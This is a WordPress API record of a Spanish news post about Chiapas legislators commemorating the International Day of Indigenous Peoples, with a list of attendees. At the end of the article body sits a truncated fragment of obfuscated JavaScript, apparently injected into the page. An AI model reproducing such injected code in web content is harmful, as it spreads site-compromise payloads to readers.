{"id":4263,"date":"2022-08-10T03:49:01","date_gmt":"2022-08-10T03:49:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4263"},"modified":"2022-08-10T03:49:02","modified_gmt":"2022-08-10T03:49:02","slug":"conmemoran-en-congreso-del-estado-dia-internacional-de-los-pueblos-indigenas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4263","title":{"rendered":"Conmemoran en Congreso del Estado D\u00eda Internacional de los Pueblos Ind\u00edgenas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220809-WA0044.jpg\" alt=\"\" class=\"wp-image-4264\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220809-WA0044.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220809-WA0044-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220809-WA0044-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220809-WA0044-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, 9 de agosto de 2022.- En el marco de la Conmemoraci\u00f3n del D\u00eda Internacional de los Pueblos Ind\u00edgenas, los diputados integrantes de la Mesa Directiva de la Sexag\u00e9sima Octava Legislatura de Chiapas, reconocieron al presidente Andr\u00e9s Manuel L\u00f3pez Obrador y al gobernador Rutilio Escand\u00f3n Cadenas, por su apoyo a favor de los grupos \u00e9tnicos.<\/p>\n\n\n\n<p>El evento realizado en la Sala Mural del Recinto legislativo, fue realizado, respetando los usos y costumbres de los pueblos originarios, un acto de tradici\u00f3n que rescata la cultura de las comunidades de Chiapas.<\/p>\n\n\n\n<p>En el encuentro la diputada Mar\u00eda de los \u00c1ngeles Trejo Huerta, presidenta de la Mesa Directiva del Congreso chiapaneco, expuso que se tiene que respetar de manera solidaria, libre y digna sus derechos, sus lenguas, usos y costumbres.<\/p>\n\n\n\n<p>Los niveles de gobierno, fomentan y crean estrategias para salvaguardar las ra\u00edces e identidad, asegur\u00f3 en su participaci\u00f3n.<\/p>\n\n\n\n<p>El Gobernador del Estado, trabaja con acciones que buscan asegurar el ejercicio pleno de los derechos de las comunidades, por eso el Congreso a trav\u00e9s de las Comisiones, seguir\u00e1n promoviendo el v\u00ednculo de hermandad y voluntad pol\u00edtica para caminar en el bienestar de Chiapas.<\/p>\n\n\n\n<p>La diputada Leticia M\u00e9ndez Intzin, expuso que el bast\u00f3n que se le entreg\u00f3 al presidente de M\u00e9xico, es un gran compromiso para seguir trabajando en el bien com\u00fan de los ind\u00edgenas de M\u00e9xico y en especial de Chiapas.<\/p>\n\n\n\n<p>La legisladora Cecilia L\u00f3pez S\u00e1nchez, acot\u00f3 que ha constatado que el gobernador Rutilio Escand\u00f3n, ha hecho lo necesario por visibilizar y atender a los ind\u00edgenas, al mismo tiempo hizo un reconocimiento a los ind\u00edgenas del EZLN quienes hicieron un parteaguas en la b\u00fasqueda del reconocimiento de sus derechos humanos.<\/p>\n\n\n\n<p>Al respecto, la diputada Roselia Jim\u00e9nez P\u00e9rez, pidi\u00f3 m\u00e1s recursos para las dependencias que atienden a los pueblos ind\u00edgenas de Chiapas, pero tambi\u00e9n en particular al CELALI a quien defendi\u00f3 para que no desaparezca y siga su papel en defensa de las lenguas originarias.<\/p>\n\n\n\n<p>Acudieron al acto protocolario, los diputados: Sonia Catalina \u00c1lvarez, Sandra Herrera Dom\u00ednguez, Alejandra Mart\u00ednez Couti\u00f1o, Leticia Albores Ru\u00edz, Mario Humberto V\u00e1zquez L\u00f3pez, Agust\u00edn Ru\u00edz Mendoza, Mar\u00eda Reyes Diego G\u00f3mez, Elizabeth Escobedo Morales, Fabiola Ricci Diestel, Mar\u00eda Esponda Torres.<\/p>\n\n\n\n<p>As\u00ed como el fiscal ind\u00edgena, Mariano L\u00f3pez P\u00e9rez; secretario de Desarrollo Sostenible de los Pueblos Ind\u00edgenas, Ram\u00f3n Ram\u00edrez; la directora del Consejo Estatal para la Cultura y las Artes, Matza Maranto Zepeda; en representaci\u00f3n de la Comisi\u00f3n Estatal de los Derechos Humanos, Claudia Ru\u00edz Couti\u00f1o, Cristina Garc\u00eda P\u00e9rez, representante del Frente de Mujeres Ind\u00edgenas Empoderadas de Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, 9 de agosto de 2022.- En el marco de la Conmemoraci\u00f3n del D\u00eda Internacional de los Pueblos Ind\u00edgenas, los diputados integrantes de la Mesa Directiva de la Sexag\u00e9sima Octava Legislatura de Chiapas, reconocieron al presidente Andr\u00e9s Manuel L\u00f3pez Obrador y al gobernador Rutilio Escand\u00f3n Cadenas, por su apoyo a favor de los grupos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4264,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4263","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4263"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4263\/revisions"}],"predecessor-version":[{"id":4265,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4263\/revisions\/4265"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4264"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}